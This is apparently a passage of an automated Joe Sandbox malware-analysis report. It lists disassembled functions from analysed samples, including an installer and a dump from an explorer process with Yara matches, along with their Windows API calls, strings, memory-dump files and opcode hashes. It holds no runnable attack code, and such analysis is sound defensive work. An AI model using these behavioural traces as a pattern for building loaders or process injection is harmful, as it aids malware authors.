                                                                                                                                                                                                                                                                            • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                                                                                                                                                                                            Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                            • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                                                                                                                            • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                                                                                                                                            • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                                                                                                            • String ID: Version
                                                                                                                                                                                                                                                                            • API String ID: 512980652-315105994
                                                                                                                                                                                                                                                                            • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                            • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                                                                                                                                                                                            Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                            • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                            • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                                                                                                                                                            Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2883127279-0
                                                                                                                                                                                                                                                                            • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                            • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                                                                                                                                                            Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                                                                                                                            • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                                                                                                                              • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                                                            • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                            • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                                                                                                                                                                                            Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                                                                                                            • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                                                                                            • String ID: !N~
                                                                                                                                                                                                                                                                            • API String ID: 623250636-529124213
                                                                                                                                                                                                                                                                            • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                            • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                                                                                                                                                                                                            Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Error launching installer, xrefs: 00405C74
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                            • String ID: Error launching installer
                                                                                                                                                                                                                                                                            • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                            • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                            • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                                                                                                                                                                            Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                            • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                              • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                                                                                                            • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                            • API String ID: 3509786178-2769509956
                                                                                                                                                                                                                                                                            • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                            • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                                                                                                                                                            Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                            • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                                                                                                                            • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 190613189-0
                                                                                                                                                                                                                                                                            • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                            • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                                                            Function 00000001402D82A0 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000021.00000002.2948075773.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000021.00000002.2947551321.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000021.00000002.2950378523.00000001402DD000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000021.00000002.2950639001.000000014040B000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000021.00000002.2950639001.000000014042C000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000021.00000002.2950639001.000000014042E000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000021.00000002.2950639001.00000001406B6000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000021.00000002.2950639001.0000000140738000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000021.00000002.2951122338.0000000140739000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000021.00000002.2951163528.000000014075E000.00000020.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000021.00000002.2951201106.0000000140764000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_33_2_140000000_explorer.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                            • Opcode ID: 40e2a232fc295a5026443da29b24fa9c722a4f82c9d20809496c69369bb5da58
                                                                                                                                                                                                                                                                            • Instruction ID: 21d2bc6bb35d802d5d5cc750b7b1863eea689a07cd70b94b43f5df2df9f0d793
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 40e2a232fc295a5026443da29b24fa9c722a4f82c9d20809496c69369bb5da58
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FA112732750F058AEB01CF61E8583A833A4FB5DB68F441E25EF6D867A4DB78C5558340

                                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                                            Function 0002663E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 1002 2663e-26654 LoadLibraryA 1003 26656-26664 GetProcAddress 1002->1003 1004 26674-26678 1002->1004 1005 26666 1003->1005 1006 26669-2666b 1003->1006 1005->1006 1006->1004 1007 2666d-2666e FreeLibrary 1006->1007 1007->1004
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,0002668B,?,?,000262FA,?,00000001,?,?,00000000), ref: 0002664A
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0002665C
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,0002668B,?,?,000262FA,?,00000001,?,?,00000000), ref: 0002666E
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000002C.00000002.3800514539.0000000000021000.00000020.00000001.01000000.00000010.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3800084586.0000000000020000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3801103375.00000000000BD000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3801103375.00000000000E3000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3801495108.00000000000ED000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000002C.00000002.3802321796.00000000000F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_44_2_20000_Dry.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                            • API String ID: 145871493-3689287502
                                                                                                                                                                                                                                                                            • Opcode ID: 23ce02170f08db2ba325813e30bc5b2fe68093baeeaadd1e691b17de89f44493
                                                                                                                                                                                                                                                                            • Instruction ID: 8aef011479d983b6568c7ac938672ced67af0453321e9f7e7bbead760a427ce0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 23ce02170f08db2ba325813e30bc5b2fe68093baeeaadd1e691b17de89f44493
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 40E0CD36A0263227A2561729BC1CB9EE56CDF82F16F050326FD00E2104EF5CCC0280E4
                                                                                                                                                                                                                                                                            Function 000261A9 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122windowCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
